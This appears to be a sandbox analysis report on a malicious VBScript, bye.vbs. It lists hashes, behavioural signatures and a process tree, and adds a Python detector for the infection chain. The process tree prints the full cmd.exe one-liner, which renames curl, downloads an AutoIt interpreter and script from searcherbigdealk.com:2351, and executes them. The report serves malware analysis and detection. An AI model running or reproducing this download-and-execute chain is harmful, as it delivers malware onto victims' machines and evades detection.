Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/10/2023, 01:50

General

  • Target

    bye.vbs

  • Size

    87KB

  • MD5

    c203856ba9d7f9a78341114422c1e72d

  • SHA1

    db4cd591b107d23e95f52148c42bd7bf272b7b82

  • SHA256

    713640bdfeb056cda0283464f5e1e85dd8ff7ecfdbe436fec5e22d86a052e3ef

  • SHA512

    1d0cd5134262b12fbed2e742e309569370d7eae16e2d8d58f55b083bcae7a108c0096b5691cc2fb061ca90e6b3226a1dd261399c5ef961c909615f49a6ae29f8

  • SSDEEP

    1536:vDgcLZK8HLHQj2Bks7wrzeABf2v60QL4mW+0rURc:bgerwj2Bk3z7doMxW+0Ec

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bye.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\efod & cd /d c:\efod & copy c:\windows\system32\curl.exe efod.exe & efod -H "User-Agent: curl" -o Autoit3.exe http://searcherbigdealk.com:2351 & efod -o yqzlpy.au3 http://searcherbigdealk.com:2351/msiefodhrst & Autoit3.exe yqzlpy.au3
      2⤵
        PID:1756
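The cmd.exe one-liner above is the whole infection chain in a single process-creation event: a system binary (curl.exe) is copied under a new name so image-name detections miss it, the renamed copy fetches the AutoIt3 interpreter and an .au3 script from the same host and port, and the interpreter is then run on the script. Because the stages are joined with a single `&` rather than `&&`, each one runs even if the previous one failed. The following is an added detection example, not output of the sandbox or code belonging to this report: it parses that command line and returns the chain's stages and indicators. The LOLBin and interpreter lists are illustrative assumptions; the command line itself is the one shown in the process tree.

```python
"""Flag a rename-LOLBin / fetch / execute chain in a cmd.exe /c command line.
Added example; the only input data is the command line from the report above."""
import re
import shlex
from urllib.parse import urlsplit

# Assumption: illustrative sets, extend them for your environment.
LOLBINS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe", "regsvr32.exe"}
SCRIPT_INTERPRETERS = {"autoit3.exe"}
SCRIPT_EXTENSIONS = (".au3",)

# Command line taken verbatim from the process tree in this report.
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\cmd.exe" /c mkdir c:\\efod & cd /d c:\\efod & '
    'copy c:\\windows\\system32\\curl.exe efod.exe & '
    'efod -H "User-Agent: curl" -o Autoit3.exe http://searcherbigdealk.com:2351 & '
    'efod -o yqzlpy.au3 http://searcherbigdealk.com:2351/msiefodhrst & '
    'Autoit3.exe yqzlpy.au3'
)


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path, quotes stripped."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def split_chain(cmdline):
    """Return the commands after 'cmd /c', split on cmd's & and && separators."""
    m = re.search(r"(?i)(?:^|\s)/c\s+(.*)$", cmdline)
    body = m.group(1) if m else cmdline
    # '&' runs the next stage regardless of the previous one's exit code.
    return [c.strip() for c in re.split(r"\s*&&?\s*", body) if c.strip()]


def analyze_cmdline(cmdline):
    """Return findings, URLs, hosts and the renamed-binary aliases seen in the chain."""
    findings, urls, aliases = [], [], {}
    for cmd in split_chain(cmdline):
        # posix=False keeps backslashes literal and leaves quotes on tokens.
        toks = shlex.split(cmd, posix=False)
        if not toks:
            continue
        verb = _basename(toks[0])
        # Resolve a renamed copy (e.g. "efod") back to the binary it was copied from.
        exe = aliases.get(re.sub(r"\.exe$", "", verb), verb)
        if verb == "copy" and len(toks) >= 3:
            src, dst = _basename(toks[1]), _basename(toks[2])
            if src in LOLBINS and src != dst:
                aliases[re.sub(r"\.exe$", "", dst)] = src
                findings.append(("renamed_lolbin", f"{src} copied to {dst}"))
        elif exe == "curl.exe":
            out = None
            for i, t in enumerate(toks[1:], 1):
                t = t.strip('"')
                if t.startswith("http://") or t.startswith("https://"):
                    urls.append(t)
                elif toks[i - 1] == "-o":
                    out = t
                elif toks[i - 1] == "-H" and t.lower().startswith("user-agent:"):
                    findings.append(("custom_user_agent", t))
            if out and _basename(out) in SCRIPT_INTERPRETERS:
                findings.append(("interpreter_download", out))
            elif out and out.lower().endswith(SCRIPT_EXTENSIONS):
                findings.append(("script_download", out))
        elif exe in SCRIPT_INTERPRETERS:
            scripts = [t for t in toks[1:] if t.lower().endswith(SCRIPT_EXTENSIONS)]
            if scripts:
                findings.append(("script_execution", f"{exe} {scripts[0]}"))
    hosts = sorted({urlsplit(u).netloc for u in urls})
    return {"findings": findings, "urls": urls, "hosts": hosts, "aliases": aliases}


if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    for code, detail in result["findings"]:
        print(f"{code:22} {detail}")
    print("hosts:", ", ".join(result["hosts"]))
```

Run against the report's command line, this yields five findings in order (renamed_lolbin, custom_user_agent, interpreter_download, script_download, script_execution), the alias efod → curl.exe, and the single host:port to block. The explicit `User-Agent: curl` header is only set on the first request; the second uses curl's default user agent, so a proxy rule keyed on one string will see only half of the chain.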

    Network

    MITRE ATT&CK Enterprise v15
